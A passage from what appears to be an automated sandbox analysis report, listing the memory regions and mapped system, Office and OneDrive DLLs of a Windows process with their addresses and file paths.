office\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 812 start_va = 0x7fef9fd0000 end_va = 0x7fef9fd4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 813 start_va = 0x7fef9fe0000 end_va = 0x7fef9fe2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 814 start_va = 0x7fef9ff0000 end_va = 0x7fefa08dfff monitored = 0 entry_point = 0x7fefa039d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\msvcp140.dll") Region: id = 815 start_va = 0x7fefa090000 end_va = 0x7fefa093fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 816 start_va = 0x7fefa0a0000 end_va = 0x7fefa0a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 817 start_va = 0x7fefa0b0000 end_va = 0x7fefa0b2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 818 start_va = 0x7fefa0c0000 end_va = 0x7fefa0c3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 819 start_va = 0x7fefa0d0000 end_va = 0x7fefa0d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll") Region: id = 820 start_va = 0x7fefa0e0000 end_va = 0x7fefa0e2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 821 start_va = 0x7fefa0f0000 end_va = 0x7fefa0f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 822 start_va = 0x7fefa100000 end_va = 0x7fefa102fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 823 start_va = 0x7fefa110000 end_va = 0x7fefa112fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll") Region: id = 824 start_va = 0x7fefa120000 end_va = 0x7fefa122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 825 start_va = 0x7fefa130000 end_va = 0x7fefa221fff monitored = 0 entry_point = 0x7fefa139060 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 826 start_va = 0x7fefa230000 end_va = 0x7fefa233fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 827 start_va = 0x7fefa240000 end_va = 0x7fefa256fff monitored = 0 entry_point = 0x7fefa24c440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\vcruntime140.dll") Region: id = 828 start_va = 0x7fefa260000 end_va = 0x7fefa473fff monitored = 0 entry_point = 0x7fefa261000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\grooveex.dll") Region: id = 829 start_va = 0x7fefa480000 end_va = 0x7fefa54dfff monitored = 0 entry_point = 0x7fefa4a30fc region_type = mapped_file name = "msvcr110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcr110.dll") Region: id = 830 start_va = 0x7fefa550000 end_va = 0x7fefa5f6fff monitored = 0 entry_point = 0x7fefa59b93c region_type = mapped_file name = "msvcp110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcp110.dll") Region: id = 831 start_va = 0x7fefa600000 end_va = 0x7fefa655fff monitored = 0 entry_point = 0x7fefa6086e8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\filesyncshell64.dll") Region: id = 832 start_va = 0x7fefa660000 end_va = 0x7fefa6b6fff monitored = 0 entry_point = 0x7fefa661118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 833 start_va = 0x7fefa6c0000 end_va = 0x7fefa889fff monitored = 0 entry_point = 0x7fefa6c7a60 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 834 start_va = 0x7fefac30000 end_va = 0x7fefac47fff monitored = 0 entry_point = 0x7fefac31010 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 835 start_va = 0x7fefae70000 end_va = 0x7fefae87fff monitored = 0 entry_point = 0x7fefae71bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 836 start_va = 0x7fefae90000 end_va = 0x7fefaea0fff monitored = 0 entry_point = 0x7fefae916ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 837 start_va = 0x7fefaeb0000 end_va = 0x7fefaecffff monitored = 0 entry_point = 0x7fefaeb1298 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 838 start_va = 0x7fefaf70000 end_va = 0x7fefaf76fff monitored = 0 entry_point = 0x7fefaf71b24 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" (normalized: "c:\\windows\\system32\\wlanutil.dll") Region: id = 839 start_va = 0x7fefaf80000 end_va = 0x7fefaf8ffff monitored = 0 entry_point = 0x7fefaf895dc region_type = mapped_file name = "alttab.dll" filename = "\\Windows\\System32\\AltTab.dll" (normalized: "c:\\windows\\system32\\alttab.dll") Region: id = 840 start_va = 0x7fefaf90000 end_va = 0x7fefaf9afff monitored = 0 entry_point = 0x7fefaf91030 region_type = mapped_file name = "ehsso.dll" filename = "\\Windows\\ehome\\ehSSO.dll" (normalized: "c:\\windows\\ehome\\ehsso.dll") Region: id = 841 start_va = 0x7fefafa0000 end_va = 0x7fefafb5fff monitored = 0 entry_point = 0x7fefafa1050 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 842 start_va = 0x7fefafc0000 end_va = 0x7fefb002fff monitored = 0 entry_point = 0x7fefafc30d8 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 843 start_va = 0x7fefb110000 end_va = 0x7fefb11afff monitored = 0 entry_point = 0x7fefb111198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 844 start_va = 0x7fefb120000 end_va = 0x7fefb146fff monitored = 0 entry_point = 0x7fefb1298bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 845 start_va = 0x7fefb150000 end_va = 0x7fefb1b6fff monitored = 0 entry_point = 0x7fefb166060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 846 start_va = 0x7fefb1d0000 end_va = 0x7fefb1dafff monitored = 0 entry_point = 0x7fefb1d4f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 847 start_va = 0x7fefb200000 end_va = 0x7fefb218fff monitored = 0 entry_point = 0x7fefb2011a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 848 start_va = 0x7fefb2a0000 end_va = 0x7fefb2b4fff monitored = 0 entry_point = 0x7fefb2a60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 849 start_va = 0x7fefb390000 end_va = 0x7fefb4b6fff monitored = 0 entry_point = 0x7fefb3910ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 850 start_va = 0x7fefb5a0000 end_va = 0x7fefb5bbfff monitored = 0 entry_point = 0x7fefb5a1198 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 851 start_va = 0x7fefb5c0000 end_va = 0x7fefb5c8fff monitored = 0 entry_point = 0x7fefb5c1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 852 start_va = 0x7fefb5d0000 end_va = 0x7fefb5fbfff monitored = 0 entry_point = 0x7fefb5d15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 853 start_va = 0x7fefb6b0000 end_va = 0x7fefb6dcfff monitored = 0 entry_point = 0x7fefb6b1010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 854 start_va = 0x7fefb830000 end_va = 0x7fefb843fff monitored = 0 entry_point = 0x7fefb8316b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 855 start_va = 0x7fefb850000 end_va = 0x7fefb864fff monitored = 0 entry_point = 0x7fefb851050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 856 start_va = 0x7fefb870000 end_va = 0x7fefb87bfff monitored = 0 entry_point = 0x7fefb8718a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 857 start_va = 0x7fefb9b0000 end_va = 0x7fefb9c0fff monitored = 0 entry_point = 0x7fefb9b1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 858 start_va = 0x7fefb9e0000 end_va = 0x7fefbb09fff monitored = 0 entry_point = 0x7fefb9e3810 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 859 start_va = 0x7fefbb10000 end_va = 0x7fefbb44fff monitored = 0 entry_point = 0x7fefbb11064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 860 start_va = 0x7fefbb50000 end_va = 0x7fefbb67fff monitored = 0 entry_point = 0x7fefbb51130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 861 start_va = 0x7fefbb70000 end_va = 0x7fefbbbafff monitored = 0 entry_point = 0x7fefbb7efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 862 start_va = 0x7fefbbc0000 end_va = 0x7fefbbcafff monitored = 0 entry_point = 0x7fefbbc1020 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 863 start_va = 0x7fefbbd0000 end_va = 0x7fefbc0afff monitored = 0 entry_point = 0x7fefbbdf410 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 864 start_va = 0x7fefbc10000 end_va = 0x7fefbc52fff monitored = 0 entry_point = 0x7fefbc1c168 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 865 start_va = 0x7fefbc60000 end_va = 0x7fefbd51fff monitored = 0 entry_point = 0x7fefbc8ac20 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 866 start_va = 0x7fefbd60000 end_va = 0x7fefbf74fff monitored = 0 entry_point = 0x7fefbf364b0 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 867 start_va = 0x7fefbf80000 end_va = 0x7fefbfd5fff monitored = 0 entry_point = 0x7fefbf8bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 868 start_va = 0x7fefbfe0000 end_va = 0x7fefc10bfff monitored = 0 entry_point = 0x7fefbfe94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 869 start_va = 0x7fefc110000 end_va = 0x7fefc12cfff monitored = 0 entry_point = 0x7fefc111ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 870 start_va = 0x7fefc130000 end_va = 0x7fefc153fff monitored = 0 entry_point = 0x7fefc131024 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 871 start_va = 0x7fefc160000 end_va = 0x7fefc353fff monitored = 0 entry_point = 0x7fefc2ec924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 872 start_va = 0x7fefc360000 end_va = 0x7fefc469fff monitored = 0 entry_point = 0x7fefc361010 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll") Region: id = 873 start_va = 0x7fefc470000 end_va = 0x7fefc649fff monitored = 0 entry_point = 0x7fefc473130 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 874 start_va = 0x7fefc7f0000 end_va = 0x7fefc7fbfff monitored = 0 entry_point = 0x7fefc7f1064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 875 start_va = 0x7fefc9d0000 end_va = 0x7fefc9edfff monitored = 0 entry_point = 0x7fefc9d13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 876 start_va = 0x7fefcc20000 end_va = 0x7fefcc66fff monitored = 0 entry_point = 0x7fefcc21064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 877 start_va = 0x7fefcf20000 end_va = 0x7fefcf37fff monitored = 0 entry_point = 0x7fefcf23b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 878 start_va = 0x7fefd030000 end_va = 0x7fefd061fff monitored = 0 entry_point = 0x7fefd03144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 879 start_va = 0x7fefd150000 end_va = 0x7fefd1bcfff monitored = 0 entry_point = 0x7fefd151010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 880 start_va = 0x7fefd420000 end_va = 0x7fefd442fff monitored = 0 entry_point = 0x7fefd421198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 881 start_va = 0x7fefd4c0000 end_va = 0x7fefd4cafff monitored = 0 entry_point = 0x7fefd4c1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 882 start_va = 0x7fefd4f0000 end_va = 0x7fefd514fff monitored = 0 entry_point = 0x7fefd4f9658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 883 start_va = 0x7fefd520000 end_va = 0x7fefd52efff monitored = 0 entry_point = 0x7fefd521010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 884 start_va = 0x7fefd530000 end_va = 0x7fefd5c0fff monitored = 0 entry_point = 0x7fefd531440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 885 start_va = 0x7fefd5d0000 end_va = 0x7fefd60cfff monitored = 0 entry_point = 0x7fefd5d18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 886 start_va = 0x7fefd610000 end_va = 0x7fefd623fff monitored = 0 entry_point = 0x7fefd6110e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 887 start_va = 0x7fefd630000 end_va = 0x7fefd63efff monitored = 0 entry_point = 0x7fefd6319b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 888 start_va = 0x7fefd6d0000 end_va = 0x7fefd6defff monitored = 0 entry_point = 0x7fefd6d1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 889 start_va = 0x7fefd6e0000 end_va = 0x7fefd6f9fff monitored = 0 entry_point = 0x7fefd6e1558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 890 start_va = 0x7fefd700000 end_va = 0x7fefd735fff monitored = 0 entry_point = 0x7fefd701474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 891 start_va = 0x7fefd7e0000 end_va = 0x7fefd84bfff monitored = 0 entry_point = 0x7fefd7e2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 892 start_va = 0x7fefd850000 end_va = 0x7fefd9bcfff monitored = 0 entry_point = 0x7fefd8510b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 893 start_va = 0x7fefd9c0000 end_va = 0x7fefd9fafff monitored = 0 entry_point = 0x7fefd9c1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 894 start_va = 0x7fefda00000 end_va = 0x7fefdb2cfff monitored = 0 entry_point = 0x7fefda4ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 895 start_va = 0x7fefdb30000 end_va = 0x7fefdbf8fff monitored = 0 entry_point = 0x7fefdbaa874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 896 start_va = 0x7fefdc00000 end_va = 0x7fefdc0dfff monitored = 0 entry_point = 0x7fefdc01080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 897 start_va = 0x7fefdc10000 end_va = 0x7fefdc17fff monitored = 0 entry_point = 0x7fefdc11504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 898 start_va = 0x7fefdc20000 end_va = 0x7fefdc90fff monitored = 0 entry_point = 0x7fefdc31e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 899 start_va = 0x7fefdca0000 end_va = 0x7fefdd06fff monitored = 0 entry_point = 0x7fefdcab03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 900 start_va = 0x7fefdd10000 end_va = 0x7fefdd5cfff monitored = 0 entry_point = 0x7fefdd11070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 901 start_va = 0x7fefdd60000 end_va = 0x7fefdd7efff monitored = 0 entry_point = 0x7fefdd660e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 902 start_va = 0x7fefdd80000 end_va = 0x7fefdf82fff monitored = 0 entry_point = 0x7fefdda3330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 903 start_va = 0x7fefdf90000 end_va = 0x7fefdfe1fff monitored = 0 entry_point = 0x7fefdf910d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 904 start_va = 0x7fefdff0000 end_va = 0x7fefe01dfff monitored = 0 entry_point = 0x7fefdff1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 905 start_va = 0x7fefe020000 end_va = 0x7fefe0fafff monitored = 0 entry_point = 0x7fefe040760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 906 start_va = 0x7fefe100000 end_va = 0x7fefe277fff monitored = 0 entry_point = 0x7fefe1010e0 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 907 start_va = 0x7fefe280000 end_va = 0x7fefe456fff monitored = 0 entry_point = 0x7fefe281010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 908 start_va = 0x7fefe4e0000 end_va = 0x7fefe5e8fff monitored = 0 entry_point = 0x7fefe4e1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 909 start_va = 0x7fefe5f0000 end_va = 0x7fefe848fff monitored = 0 entry_point = 0x7fefe5f1340 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 910 start_va = 0x7fefe850000 end_va = 0x7fefe8e8fff monitored = 0 entry_point = 0x7fefe851c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 911 start_va = 0x7fefe8f0000 end_va = 0x7fefe9c6fff monitored = 0 entry_point = 0x7fefe8f3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 912 start_va = 0x7fefea70000 end_va = 0x7feff7f7fff monitored = 0 entry_point = 0x7fefeaecebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: 